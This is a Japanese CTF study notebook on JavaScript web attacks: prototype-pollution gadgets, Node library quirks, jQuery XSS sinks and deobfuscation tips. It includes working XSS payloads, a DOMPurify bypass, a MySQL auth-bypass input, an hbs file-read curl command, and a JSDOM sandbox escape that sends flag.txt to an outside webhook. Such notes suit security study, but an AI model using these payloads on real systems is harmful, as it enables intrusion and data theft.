- Node.jsでプロトタイプ汚染後に任意コード実行まで繋げた事例 - knqyf263's blog
  - 色々書いてある
- GitHub - BlackFan/client-side-prototype-pollution: Prototype Pollution and useful Script Gadgets
  - 一覧としてまとめられている
  - client-side-prototype-pollution/embedly.md at master · BlackFan/client-side-prototype-pollution · GitHub
    - 例えばここのPoCとか見るとわかりやすい。上のscriptでプロトタイプ汚染をして、scriptで呼び出すだけで実行される
    - ちなみに、Embedlyだと、__proto__.cssにURLを入れるとCSSとして読み込んでくれる
- Vue.jsでのGadget例
  - s1r1us - zer0ptsCTF2021-challenges
    - constructor[prototype][props][][value]=a&constructor[prototype][name]=":''.constructor.constructor('alert(1337)')(),"
    - constructor[prototype][v-if]=_c.constructor('alert(1337)')()
    - constructor[prototype][data]=a&constructor[prototype][template][nodeType]=a&constructor[prototype][template][innerHTML]="<script>alert(1337)<\/script>"
    - constructor[prototype][v-bind:class]=''.constructor.constructor('alert(1337)')()
  - GitHub - BlackFan/client-side-prototype-pollution: Prototype Pollution and useful Script Gadgets
    - ここにも色々ある
- jqueryでのGadget例
  - CTFtime.org / VolgaCTF 2021 Qualifier / Online Wallet (Part 2)
    - Object.prototype.div=['1','<img src onerror=alert(1)>','1']が達成できれば$('<div x="x"></div>')が含まれる部分で発火する
- Squirrellyのgadget
  - InCTF 2021 writeup - st98 の日記帳 - コピー
  - GHSL-2021-023: Remote code execution in squirrelly - CVE-2021-32819 | GitHub Security Lab
- Prototype Pollution in Kibana
- posixさんの記事にあるプロトタイプ汚染からのRCE
  - Handlebars + flat: flatライブラリでunflattenが使われていたらバージョンによってはプロトタイプ汚染が発生する
  - HTB x UNI CTF 2020 | N0xi0us
  - Cyber Apocalypse CTF 2021 Writeup | y011d4.log
発生契機
- jsonを受け取ってclone関数でオブジェクトを作る
  - maze [InterKosenCTF 2020] - HackMD
  - clone系の関数があると怪しいらしい
- ojb[a][b] = c;で、a,b,cのどれも外部入力可能
- 適当なDeepCopyとかDeepMerge関数
  - 再帰的に入れ込んでいれば怪しい ctf/2021/dice_ctf/build_a_better_panel at master · qxxxb/ctf · GitHub
テク
- protoを使えないようにフィルタリングしている場合は別の表記でバイパスする
  - constructor.prototypeでもOKなので、['constructor']['prototype']みたいにすると['proto']と同等
- VolgaCTF 2021 Qualifier - Online Wallet (Part 2) · Issue #27 · aszx87410/ctf-writeups · GitHub
  - obj=Object.create(null)として修正していて大丈夫じゃんとなっても、配列を与えるとできる例
    - ?a[0][]=1&a[0][__proto__][abc]=1 -> [].abc==='1'
    - ?a[0][]=1&a[0][__proto__][__proto__][b]=1 -> Object.prototype.b='1'
defineSetterを汚染する
- __defineSetter__を汚染することで、代入時に発動する攻撃を仕掛けることもできる。exploit.py
問題
- 存在しないプロパティを埋め込む
  - WeCTF 2020
- __defineSetter__を汚染する
  - CTFtime.org / TSG CTF 2020 / Beginner's web
参考

ライブラリとかフレームワークとか

node-mysql-native
- JSのMySQLライブラリ
- connection.query('SELECT * FROM users WHERE id = ?', [id]のidに何が入ってるとどうなるか
  - mysqljs/mysql: A pure node.js JavaScript Client implementing the MySQL protocol.に書いてある
  - 使えそうなのは連想配列を入れると、key = 'val'として出力される
- 攻撃例
  - const sql = 'Select * from users where username = ? and password = ?';でcon.query(sql, [u, p], function(err, qResult) {となってる
  - これでusername=michelle&password[password]=1とすると、SELECT * FROM users WHERE username='michelle' AND password=`password`='1'となる
  - password=`password`='1'これが恒真らしい、なぜだ…
dotenv
- node.js向けの環境変数を扱うライブラリ。
- ディレクトリトラバーサル脆弱性があれば、どこかのapp/.envを見ることで環境変数を抜ける。これ
Angular
- URLで\をスラッシュとして使用可能。パーセントエンコーディングはデコードされる。
- SSRF
  - Angularでthis.http.get('/api/answer')のようにリクエストを飛ばしている箇所があれば、PROTOCOL + HOST + / PATHでアクセスする
  - なので、HostにCNAMEで127.0.0.1/api/true-answerを指すようにしたドメインを指定すれば、https://127.0.0.1/api/true-answer/api/answerのようにSSRFできる
  - 適当なサイトに誘導してリダイレクトで127.0.0.1/api/true-answerへ飛ばせば、SSRFを達成できる。
- TokyoWesterns CTF 2020 | writeups by @terjanq
  - AngularのSecondary segments - Angular Routerという機能を使ってバイパスする
  - これを使うだけ http://another-universe.chal.ctf.westerns.tokyo/(primary:debug/answer).
  - primaryを使うのみがミソっぽい
- ペイロード
Inspector
- nodejsのbuilt-inライブラリ。バックで動いているV8エンジンに直接命令を下せる
- ライブラリ自体：Inspector | Node.js v14.13.1 Documentation
- 命令の内容：Chrome DevTools Protocol - version v8 - Runtime domain
- privateプロパティが覗ける SECCON 2020 Online CTF - Capsule & Beginner’s Capsule - Author’s Writeup - HackMD
v8ライブラリ
- ヒープが抜き出せる
- const v8 = require('v8'); const memory = v8.getHeapSnapshot().read(); console.log(memory.toString());
- これだけ。この問題では量が多いので、sliceで抜き出して答えている
Lodash
- 4.17.4にはプロトタイプ汚染の脆弱性がある
hbs
- テンプレートエンジンであるhandlebars.jsをexpressから使えるようにしたもの
- The Secret Parameter, LFR, and Potential RCE in NodeJS Apps
  - LFR (:Local File Read)ができる
  - router.post('/', function(req, res, next) { res.render('index', req.body.profile) });みたいに呼び出すときに
  - curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://[attackhost]/'とすると、./../routes/index.jsを出力してくれる
  - 修正: res.render('index', { profile })のように直下におかないようにするのがいいみたい
- 4.0.3以下ならHandlebars.jsでRCE脆弱性がある Handlebars template injection and RCE in a Shopify app
jpv
- A vulnerability in validate() · Issue #6 · manvel-khnkoyan/jpv · GitHub
  - 変数名をconstructor.nameを追加でつけることによって偽装できる
querystring
- expressのPOSTでbodyからquerystringを受け取ってconst { p } = querystring.parse(body)みたいにパースしているとき
  - curl http://34.84.5.211/ -d 'p=1&p=%ff/ＮＮ/ＮＮ/ＮＮ/flag' -H 'Content-Type: text/plain'
  - こんな感じにＮを使うことで.を表現できる
axios
- axios 0.21.0
  - SSRFできる Requests that follow a redirect are not passing via the proxy · Issue #3369 · axios/axios · GitHub
    - 参照先からリダイレクトさせるとプロキシを通さない（アクセス制限しててもbypass可能）
    - 単純に以下のようにして、ここにアクセスさせるとhttp://127.0.0.1/adminにリダイレクトするが、これはproxyを通さず表示可能 js const http = require('http') http.createServer(function (req, res) { res.writeHead(302, {location: 'http://127.0.0.1/admin'}) res.end() }).listen(5566)
Mermaid
- #1106238 Stored XSS via Mermaid Prototype Pollution vulnerability
- #1103258 Stored DOM XSS via Mermaid chart
JSDOM
- DOMをjsで作るもの（よくわかってない）
- ここで作成されたDOMでonclickとかが呼ばれた場合はサーバ側のDOMとして動作するので、サーバ側でRCEができる感じになる
- ただ、サンドボックス上で評価されるので工夫が必要であるが、vmモジュールを使ったサンドボックスなので、既知の脱獄手順を使ってホスト上でRCEしよう
- corCTF2021の課題•ブライスのブログ
  - <button class="next" onclick="const ForeignFunction = this.constructor.constructor;const process = ForeignFunction('return process')(); const require = process.mainModule.require; require('http').get('http://webhook.x.pipedream.net/?q=' + require('fs').readFileSync('flag.txt'));">next</button>
DOMPurify: JS向けサニタイズライブラリの定番。結構強いから、基本的には抜けない。
- 脆弱性
  - Write-up of DOMPurify 2.0.0 bypass using mutation XSS - research.securitum.com
    - <svg></p><style><a id="</style><img src=1 onerror=alert(1)>">で攻撃可能
Express
- app.use(bodyParser.urlencoded({ extended: true }))
  - これがあるとGETパラメターに配列、連想配列を指定することができる
  - x[]=a&x[]=bだとx=['a','b']
  - x[a]=1&x[b]=2だとx=[a: '1',b: '2']
- ルーティングの文字は大文字小文字区別しないのでrouter.get('/flag', (req, res) => {とあったら/FLAGでもアクセス可能
- リクエストがどうなったら終わるか
  - return res.status(400).send('deploymentId required!').end();のようにendがついてたら終わる
  - return res.status(402).set('X-Billing-Account', account);のようにendが無くて、nextがあれば、nextへ遷移する（！！）
React
- CTFtime.org / redpwnCTF 2021 / MdBin
  - PrototypePollution経由でXSS成功させている？

jQuery

danger
- userinputがそのまま出力されるケース
  - $("#element").html([input]);
  - $("#element").append([input]);
- v1.6.2以前
  - $(location.hash)として#<img>を与えるとimgタグが作られる
safe
- $btnFacebook = $('<div />', {"data-href" : "[input]"})のように辞書形式でpropertyを指定すればhtml化されてもうまいことエスケープされる
- $("#X").text([input]);
jQueryのgetJSONはcallback=?がURLに含まれる場合にはJSONPとして解釈する
- this.contest = await $.getJSON(`/${location.hash.slice(1)}.json`)みたいになっていたら#/example.com/aで外部の//example/a.jsonを見に行ってくれる
- この場合に/example.com/a.js?callback=?&とすればjsを実行してくれる

TypeScript

TypeScript: TS Playground - An online editor for exploring TypeScript and JavaScript
- ここでTS実行とか、jsにトランスパイルしたらどうなるかとか気軽に見れる
hard-privateの中身をトランスパイル後に見る方法
- Beginner's Capsule [SECCON 2020 Online CTF] - はまやんはまやんはまやん
- var __classPrivateFieldGet = function (receiver, privateMap) { return privateMap.get(receiver); };を定義して、
- console.log(eval('__classPrivateFieldGet([インスタンス変数], [private名の#を_にしたもの])'));
- beginners-capsule.js これで丸ごと持ってこれる

JavaScript難読化

Javascript Obfuscator
- javascript-obfuscator/javascript-obfuscator: A powerful obfuscator for JavaScript and Node.js
- よく見るし、業界標準？（業界人でないので分からないが、資料はたくさん出てくる）
- リソースを出力する謎関数を作成する。
  - 手作業で分解するのはだいぶつらいので、Chromeのデベロッパーツールでブレークして、使われている_0x2384('0x3')みたいなやつの中身を見ていくのがオススメ。
- 0x3936 のような特徴的な識別子、debugger 文による解析妨害、0x487fdb(0xd9, 'og)h') のようによくわからない関数を呼び出して文字列等を取り出しているといった特徴がある。
JSFuck
- []+[+[[][]]]みたいなやつはJSFuckという難読化形式。
- https://enkhee-osiris.github.io/Decoder-JSFuck/ で解除可能。
うーにゃー
- (」・ω・)」うー!(/・ω・)/にゃー!encode
  - kusanoさん作
- デコード方法
  - ksnctf #3 Crawling Chaos - Qiita
    - console.logでくるんで実行してデコードする
  - 【(」・ω・)」うー!(/・ω・)/にゃー!】 ksnctfのCrawling Chaosを解いてみた | WEB EGG
    - jsファイルにしてnodeで実行する
  - うまくいけば抜き出せる
難読化解除テク（と言ってもほぼ根性）
- フォーマッタ DirtyMarkup Beautifier - Javascript Formatter, JS Tidy Up
  - 体裁を整えたりしてくれる
Chromeのローカルオーバーライド
- これを使うと、ページを再読み込みしても修正されたjsなどを実行できる。
  1. やりたいサイトでデベロッパーツールを開く
  2. SourceパネルのOverridesタブを開く、適当なフォルダを指定する（どこでもいい）
  3. Pageタブを開き、修正をローカルで永続化しておきたいファイルを右クリックして、Save for overridesを選択する
  4. これでオーバーライドできたので、適当に修正して、実行する
- javascriptであれば、オーバーライド後に、Networkパネルから目的のjsファイルを選択して、Previewタブを開くと、ちょっときれいになったjsが得られるので、それを持ってきて、オーバーライドしたところで上書きするとちょっと幸せになる。console.log(見たい変数);でバンバン入れて、中身を見ていこう。
何を探すか
- jsだと暗号化とかも自前でやってるから、encryptとかdecryptとかのキーワードで探してみると何か出てくるかも
- どこかで外部からデータを持ってきているなら、SQLiができるかもしれない
  - httpとかで検索したら良い感じのURL出てくるかも
参考
- JavaScript難読化読経
  - Chrome Developer Toolsでのステップ実行が書いてある。便利。
- 難読化されたJavaScriptコードを読む : document
  - IDEアシストを使う方法が書いてある
  - やったことないけど、静的解析で使ってないやつを消すとか、機械的にやれることはまだまだありそう（自動化余地あり）
debugger文を使った解析妨害コード
- Securinets CTF Quals 2021 の writeup - st98 の日記帳
  - とりあえずDeactivate breakpointsで妨害は阻止できる（でもデバッグできない）
  - 解析妨害を潰していきましょう。Deactivate breakpoints を切って debugger が実行された際の Call Stack を確認すると、index.html の 1029 行目からこの関数が呼び出されていることがわかります。
  - javascript-obfuscator/DebuggerTemplate.ts at 252b901b6954ba91cb1a82fa8a7b048e5ebbffeb · javascript-obfuscator/javascript-obfuscator · GitHubのような妨害コードと似ているところを探して、全部削除する
- Chrome Developer Toolsがsource codeをbeautifyする前に（もしくは、している間に）ブレークさせる
  1. Chrome Developer Toolsを開く（解析妨害コードでブレークする）
  2. ブレークしている状態で本当にブレークさせたい所にブレークポイントを置く
  3. 一旦閉じる
  4. Chrome Defveloper Toolsを開くと同時に、ブレークさせたい所が発動するようなアクションをする（例えばボタンを押す）
  5. すると、解析妨害コードよりも先に手順4のアクションが優先され、ブレークさせたい所でブレークさせることができる